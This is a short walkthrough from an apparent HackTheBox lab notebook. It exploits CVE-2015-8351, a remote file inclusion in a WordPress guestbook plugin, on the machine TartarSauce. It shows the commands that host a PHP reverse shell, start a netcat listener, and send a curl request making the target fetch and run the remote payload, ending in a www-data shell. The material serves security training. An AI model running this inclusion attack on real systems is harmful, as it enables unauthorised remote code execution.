InfoSec LAB

TartarSauce_Exploitation

Created: 2 min read

CVE-2015-8351

According to the text file, abspath parameter of ajaxresponse.php does not properly sanitize user input, resulting in RFI(Remote File Inclusion) via including a file named wp-load.php from arbitrary remote server. This means that I can host a malicious PHP file, wp-load.php, and have the target fetch and execute it via the require() function by sending a GET request to the respective URL

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ simplehttp .   
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Hosting the payload over HTTP on Kali

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ nnc 9999             
listening on [any] 9999 ...

Netcat listener is also set

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ curl 'http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.10:8000/'

Sending it via curl The target web app will use the require() function to look for wp-load.php file in whatever directory is put at the abspath parameter. In this case, It’s the Kali web server, hosting the malicious (PHP reverse shell) wp-load.php

As expected, the local web server running on Kali is logging the payload being fetched out by the target web server

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ nnc 9999             
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.88] 45910
SOCKET: Shell has connected! PID: 3957
whoami
www-data
hostname
TartarSauce
ifconfig
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:55:4f  
          inet addr:10.10.10.88  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1290083 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1284690 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:276979062 (276.9 MB)  TX bytes:604503882 (604.5 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:16152 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16152 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1201888 (1.2 MB)  TX bytes:1201888 (1.2 MB)

Initial Foothold established to the target system as www-data by exploiting CVE-2015-8351 on the target web application

Interactive Graph View

Backlinks